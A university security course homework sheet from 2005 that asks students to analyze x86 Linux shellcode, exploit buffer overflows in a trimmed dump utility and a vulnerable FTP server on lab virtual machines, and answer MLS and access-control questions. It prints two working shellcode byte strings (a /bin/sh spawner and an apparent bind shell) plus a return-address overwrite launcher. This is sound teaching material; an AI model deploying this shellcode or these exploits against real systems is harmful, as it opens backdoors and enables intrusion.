CS38, Security and Privacy, Spring 2005
Homework 1
Due April 23
The items marked with *) are hard, and therefore extra-credit, but I encourage you to try them.
The files for the problems are in http://www.cs.dartmouth.edu/~cs38/hw1/
1. a) Analyze the following x86 Gnu/Linux shellcode and submit code in C that represents its functionality.
char shellcode[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh";
In the example from which this shellcode was taken, it was followed by the following program, and could be launched by running it:
void main() {
int *ret;
ret = (int *)&ret + 2; /* (!) */
(*ret) = (int)shellcode;
}
Explain the meaning of the manipulation with ret on the marked line.
This shellcode should work (as in, I tried it, and it worked) on the cs38victim.cs.dartmouth.edu machine and on your virtual machines. Try running this code on one of the department's Fedora Core 3 machines. What happens there and why?
Reference: http://docs.cs.up.ac.za/programming/asm/derick_tut/syscalls.html from the helpful http://docs.cs.up.ac.za/programming/asm/derick_tut
For your convenience, this and the following shellcode are in the above homework directory as shellcode1.c and shellcode2.c.
b*) The same for
char shellcode[] =
"\x31\xc0\x89\xc3\xb0\x02\xcd\x80\x38\xc3\x74\x05\x8d\x43\x01\xcd\x80"
"\x31\xc0\x89\x45\x10\x40\x89\xc3\x89\x45\x0c\x40\x89\x45\x08\x8d\x4d"
"\x08\xb0\x66\xcd\x80\x89\x45\x08\x43\x66\x89\x5d\x14\x66\xc7\x45\x16"
"\x07\xd3\x31\xd2\x89\x55\x18\x8d\x55\x14\x89\x55\x0c\xc6\x45\x10\x10"
"\xb0\x66\xcd\x80\x40\x89\x45\x0c\x43\x43\xb0\x66\xcd\x80\x43\x89\x45"
"\x0c\x89\x45\x10\xb0\x66\xcd\x80\x89\xc3\x31\xc9\xb0\x3f\xcd\x80\x41"
"\x80\xf9\x03\x75\xf6\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62"
"\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80";
Here you will have to use not only the above reference, but also UNIX manpages and, likely, kernel code at http://lxr.linux.no. Since this shellcode uses socket calls, some familiarity with socket programming (socket(2), bind(2), listen(2), accept(2)) will be helpful. Such a tutorial can be had from the http://advancedlinuxprogramming.com chapter on sockets, or one of the many web tutorials, e.g.: http://www.scit.wlv.ac.uk/~jphb/comms/sockets.html. The manpage ascii(7) may also be useful.
c*) Download and analyze an exploit that contains a binary x86 shellcode. http://packetstormsecurity.nl is a good source, look at "last 10 exploits" or "last 50 exploits".
2. Under the standard MLS model, can a user cleared for
(secret, {dog, cat, pig})
read the following data?
3. a) Define in your own words MAC, DAC, and the principle of least privilege.
b) Suggest an administrative implementation of a "no-write-down" scheme for a real library. You can employ doorkeepers, ID checkers, conduct searches etc. Assume that the secret information is too voluminous to just memorize and carry around in one's head, i.e. some notes need to be taken.
4. I found this program called "setmode" on a Gnu/Linux machine. It turned out to be a recent addition, and not part by any software package for that distribution.
# ls -l /usr/bin/setmode
-rwsr-xr-x 1 root root 35108 Jan 15 2005 /usr/bin/setmode
What were its function and likely use?
Use Shift+leftclick to download this program from the browser, or just use the most useful program wget:
wget http://www.cs.dartmouth.edu/~cs38/hw1/setmode
5. Recall the buffer overflow vulnerability in dump-0.4b13 from the precious exercise. Assume that the target program exists on your system as suid-root. If you haven't found the vulnerability, look for it now. If you cannot find it, or have trouble understaning the hints, please come to my office hours.
I reduced the code in dump-0.4b13 to a little bit more than the vulnerable part: dump-0.4b13-vuln.tar.gz. The vulnerability is commented and the makefile contains a test to demonstrate the tell-tale segfault.
Exploit it. Use any shellcode you like, feel free to use a canned one. For simplicity I suggest using a machine without stack protection or non-executable stack, such as your virtual machine. The host machine our virtual network will do as well, but make sure you kill any backdoors that you start (in particular, the shellcode from (2) will create one) -- our goal is to understand vulnerabilities, not create them on our own systems!
6. Suppose that you are a system administrator (root) on a Gnu/Linux machine. One day you dicover a suspicious process that appears to be communicating over the network. You would like to listen in on its communications before killing the process. What system commands or resources would you use? What if you discover that communications are encrypted?
The following part will be postponed until notified you are notified that your virtual machine is ready:
On your virtual machines you will find such a process. Capture some plaintext that it is communicating.
7. In the homework directory http://www.cs.dartmouth.edu/~cs38/hw1/ you will find a vulnerable FTP server mtftpd-0.0.3, the posting that contains a vulnerability diclosure mtftpd.txt and and exploit realizing that vulnerability 0x666-ftpd.c.
a) Explain the nature of the vulnerability and the trick used by the exploit code.
b*) Exploit it. The server code requires root to run, so your virtual machines will be the most convenient environment for this.
NOTE: The original server code, apparently abandoned by its developers on sourceforge.net, contained at least two bugs that I had to fix in order to compile and exploit it. Please use my patched version mtftpd-0.0.3-patched.tar.gz if you decide to compile it.
Also note that the exploit is messy. It contains some code that never gets used and doesn't actually work out of the box. You will need to understand the trick and the nature of the underlying vulnerability in order to tweak it. This can be very frustrating, be warned.
Back to Dartmouth CS Home Page
Sergey Bratus